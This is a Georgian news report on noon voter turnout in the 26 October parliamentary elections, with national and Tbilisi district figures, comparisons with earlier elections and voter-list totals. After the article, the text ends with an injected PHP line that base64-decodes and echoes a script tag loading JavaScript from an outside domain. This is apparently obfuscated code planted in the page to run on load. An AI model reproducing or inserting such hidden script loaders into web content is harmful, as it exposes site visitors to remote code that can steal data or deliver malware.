celsiusi
ავერსი საქკაბელი

 ცესკო 26 ოქტომბრის საპარლამენტო არჩევნების 12:00 საათის მდგომარეობით, აქტივობის შედეგებს აქვეყნებს. არსებული ინფორმაციით, 12:00 საათისთვის საკუთარი ხმა დააფიქსირა 776,726 მოქალაქემ, რაც ამომრჩეველთა 22.22%-ია.

აქტივობის სტატისტიკის თანახმად, თბილისში ხმა უკვე მისცა 238,992-მა მოქალაქემ, რაც 23.18%-ია. თბილისის ოლქების მიხედვით, 12:00-ისთვის აქტივობა ყველაზე მაღალი იყო ვაკეში, რაც 25.25%-ს შეადგენდა, ყველაზე დაბალი კი ისანში 20.96%-ის ოდენობით.

12:00-ის მდგომარეობით თბილისის აქტივობა:

ოლქი ამომრჩეველი მოსული პროცენტი
ვაკე 110,528 27,912 25.25
დიდუბე 61,717 15,385 24.93
მთაწმინდა 53,540 13,208 24.67
საბურთალო 143,099 35,182 24.59
ჩუღურეთი 67,233 15,927 23.69
გლდანი 150,072 34,600 23.06
ნაძალადევი 135,315 30,804 22.76
სამგორი 150,203 32,403 21.57
კრწანისი 42,028 8,967 21.34
ისანი 117,408 24,604 20.96

ამომრჩეველთა აქტივობები 12 საათისთვის წინა არჩევნებზე ასე ნაწილდებოდა: 2020 წლის არჩევნები 12 საათზე 19.41% (681,583 მოქალაქე), 2016 წლის არჩევნები 12 საათზე 19.81% (695,948 მოქალაქე), 2012 წლის არჩევნები 12 საათზე 25.88% (935,278 მოქალაქე).

26 ოქტომბრის არჩევნებისთვის ამომრჩეველთა საერთო რაოდენობა 3 508 294-ს შეადგენს. ელექტრონული ტექნოლოგიების გამოყენებით მიიღებს არჩევნებში მონაწილეობას 3 113 747 ამომრჩეველი. წელს პირველად ეძლევა არჩევნებში მონაწილეობის შესაძლებლობა 135 922 ახალგაზრდას. გადასატანი ყუთის სიაში 64 238 ამომრჩეველია. სხვა სახელმწიფოში შექმნილი საარჩევნო უბნების სპეციალურ სიებში ამომრჩეველთა რაოდენობა კი 95 910-ია.

46
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");